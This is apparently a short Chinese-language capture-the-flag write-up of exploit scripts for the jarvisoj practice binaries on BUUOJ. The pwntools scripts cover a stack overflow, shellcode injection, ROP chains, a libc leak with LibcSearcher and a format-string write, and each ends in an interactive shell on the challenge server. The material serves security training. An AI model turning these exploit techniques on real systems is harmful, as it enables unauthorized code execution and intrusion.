0x01 jarvisoj_level0
簡單的地址改寫
from pwn import *
p = remote('node3.buuoj.cn', 26882)
#p = process('./level0')
shell_addr = 0x0000000000400596
p.sendline('a'*0x88+p64(shell_addr))
p.interactive()
0x01 jarvisoj_level2
下面的代碼本地可行,但遠程由於數據接收順序有問題,可以用jarvisoj_level3的payload稍作修改使用。
from pwn import *
context.log_level = 'debug'
p = remote('node3.buuoj.cn', 29661)
#p = process('level1')
p.recvuntil('this:')
buf_addr = int(p.recv(10), 16)
print hex(buf_addr)
payload = asm(shellcraft.sh())
payload = payload.ljust(0x8C, '\x00')
payload += p32(buf_addr)
p.sendline(payload)
p.interactive()
0x02 jarvisoj_level2
簡單rop,在可執行文件中找到rop
from pwn import *
p = remote('node3.buuoj.cn', 26369)
bin_sh = 0x0804A024
system_addr = 0x08048320
p.sendline('a'*0x8C + p32(system_addr) + p32(0) + p32(bin_sh))
p.interactive()
0x03 jarvisoj_level2_x64
64位的
from pwn import *
context.log_level = 'debug'
p = remote('node3.buuoj.cn', 27014)
#p = process('./level2_x64')
elf = ELF('./level2_x64')
pop_rdi = 0x00000000004006B3
system_plt = elf.plt['system']
str_sh = 0x0000000000600A90
p.recvuntil('Input:\n')
p.sendline('a'*0x88 + p64(pop_rdi) + p64(str_sh) + p64(system_plt))
p.interactive()
0x04 jarvisoj_level3
泄露libc基址,構造rop
from pwn import *
from LibcSearcher import *
#p = process('./level3')
p = remote('node3.buuoj.cn', 26763)
elf = ELF('level3')
read_got = elf.got['read']
write_plt = elf.plt['write']
vul_addr = 0x0804844B
payload = 'a'*0x8C +p32(write_plt) + p32(vul_addr) + p32(1) + p32(read_got) + p32(4)
p.sendlineafter('Input:\n', payload)
read_addr = u32(p.recv(4))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload = 'a'*0x8C + p32(system_addr) + p32(0) +p32(str_bin_sh)
p.sendlineafter('Input:\n', payload)
p.interactive()
0x05 jarvisoj_level4
和 jarvisoj_level3一樣,只有輸入有些差別。
0x06 jarvisoj_level3_x64
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p = remote('node3.buuoj.cn', 26368)
elf = ELF('./level3_x64')
vul_addr = 0x00000000004005E6
pop_rdi_ret = 0x00000000004006b3
pop_rsi_r15_ret = 0x00000000004006b1
write_got = elf.got['write']
write_plt = elf.plt['write']
payload = 'a'*0x88 + p64(pop_rsi_r15_ret) + p64(write_got) + p64(0) + p64(pop_rdi_ret) + p64(1) + p64(write_plt) + p64(vul_addr)
p.sendlineafter('Input:\n', payload)
write_addr = u64(p.recv(6).ljust(8, '\x00'))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload = 'a'*0x88 + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(vul_addr)
p.sendlineafter('Input:\n', payload)
p.interactive()
0x07 jarvisoj_fm
簡單的格式化字符串,找到棧的偏移量,向x寫入4就行。
from pwn import *
p = remote('node3.buuoj.cn', 27369)
# p = process('./fm')
elf = ELF('./fm')
x_addr = 0x0804A02C
payload = p32(x_addr) + '%11$n'
p.sendline(payload)
p.interactive()